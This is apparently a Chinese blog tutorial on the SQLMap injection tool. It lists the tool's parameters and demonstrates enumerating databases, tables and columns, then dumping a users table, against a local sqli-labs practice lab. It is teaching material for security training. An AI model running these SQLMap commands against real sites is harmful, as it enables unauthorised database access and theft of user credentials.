SQLMap工具使用

一、SQLMap介绍

SQLMap 是一款强大的开源自动化 SQL 注入工具,用于检测和利用 Web 应用程序中的 SQL 注入漏洞。其工作原理是SQLMap 通过向目标 URL 发送带有特殊构造的 SQL 语句的请求,观察目标应用程序的响应,来判断是否存在 SQL 注入漏洞。例如,它会尝试在 URL 参数中添加单引号、注释符号等特殊字符,观察应用程序是否返回异常信息。如果发现存在漏洞,SQLMap 会根据漏洞类型和目标数据库的特点,构造合适的 SQL 注入语句,以获取所需的信息或执行命令。例如,通过联合查询注入,可以将恶意查询与原查询合并,从数据库中获取额外的数据。

SQLMap工具地址:

官方网站:sqlmap: automatic SQL injection and database takeover toolhttps://sqlmap.org/

GitHub项目地址:https://github.com/sqlmapproject/sqlmap

二、SQLMap使用前言

在使用SQLMap这款工具前,需提前安装好python编译工具,本次使用结合sqli-labs-master靶场进行演示

注意:在SQLMap安装目录下使用,如

红色框住部分输入cmd,然后点击回车,进入命令行界面

三、SQLMap基本参数

可输入sqlmap.py --help 或 sqlmap/py -h 进行指令查看

-d 指定直接数据库连接得连接字符串,直接连接到数据库。

-u 指定URL目标

-I 从Burp或WebScarab代理得日志中解析目标

-m 扫描文本文件中给出得多个目标,批量扫描

-r 从文本中加载HTTP请求。 用 * 标记注入位置

-g 将Google Dork得结果作为目标URLh

-a 获取所有信息

-current-user 获取DBMS当前用户

--current-db 获取DBMS当前数据库

--hostname 获取DBMS当前主机名

--is-dba 检测当前用户是否为管理员用户

--users 查询DBMS用户

--passwords 查询DBMS用户密码hash

--dbs 查询DBMS数据库

--tables 查询DBMS数据库中得表

--columns 查询DBMS数据库表得列名

--dump 查询转储DBMS数据库表

--dump-all 转储DBMS所有数据库表

-D db_name 指定要求枚举的DBMS数据库名

-T table_name 指定要枚举得DBMS表

-C column_name 指定要枚举得DBMS列

--batch 从不询问用户输入,使用所有默认配置

常用语法:

复制代码
查看所有数据库:python sqlmap.py -u "url地址/?id=1" --dbs --batch

查看某个数据库所有表名:python sqlmap.py -u "URL地址" -D 数据库名 --tables

查看某个数据库下某张表下所有字段名:python sqlmap.py -u "URL地址" -D 数据库 -T 表名 --columns

四、迈入实践,以sqli-labs-master靶场第一关为例:

1、打开sqli-labs-master中第一关Less-1

2、输入python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs

3、成功获取所有数据库库名

4、获取数据库security下所有的表名

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables

5、获取数据库security下users表名下所有字段名

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --columns

6、获取数据库security下users表名下所有字段名的数据

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --dump

注:--dump命令请谨慎使用,切勿违法使用,使用--dump参数后,将会在计算机本地生成一个.csv表格数据存储,里面包含某个数据库某张表下所有字段的具体内容

五、拓展使用,以sqli-labs-master靶场为例子:

查询当前数据库:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db

查询当前数据库用户:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user

查询当前数据库版本信息:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -banner

那么SQLMap这款工具简单介绍这里,SQLMap工具十分强大,以上只是部分用法,更多详细用法可结合官方操作文档去使用。

相关推荐
RLG_星辰4 小时前
第六章-哥斯拉4.0流量分析与CVE-2017-12615的复现
笔记·安全·网络安全·tomcat·应急响应·玄机
独行soc7 小时前
2025年渗透测试面试题总结-某服面试经验分享(附回答)(题目+回答)
linux·运维·服务器·网络安全·面试·职场和发展·渗透测试
2501_916013749 小时前
从一次被抄袭经历谈起:iOS App 安全保护实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp
请再坚持一下10 小时前
网络安全护网行动之个人见解
安全·web安全·网络安全
独行soc12 小时前
2025年渗透测试面试题总结-某步在线面试(题目+回答)
linux·网络·安全·web安全·面试·职场和发展·渗透安全
00后程序员张13 小时前
做 iOS 调试时,我尝试了 5 款抓包工具
websocket·网络协议·tcp/ip·http·网络安全·https·udp
芯盾时代14 小时前
RSAC 2025观察:零信任+AI=网络安全新范式
人工智能·安全·web安全·网络安全
☞无能盖世♛逞何英雄☜14 小时前
文件包含漏洞
安全·web安全
2501_9151063216 小时前
开发者如何优雅应对HTTPS抓包难题
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Star abuse17 小时前
网络安全赛题解析
安全·web安全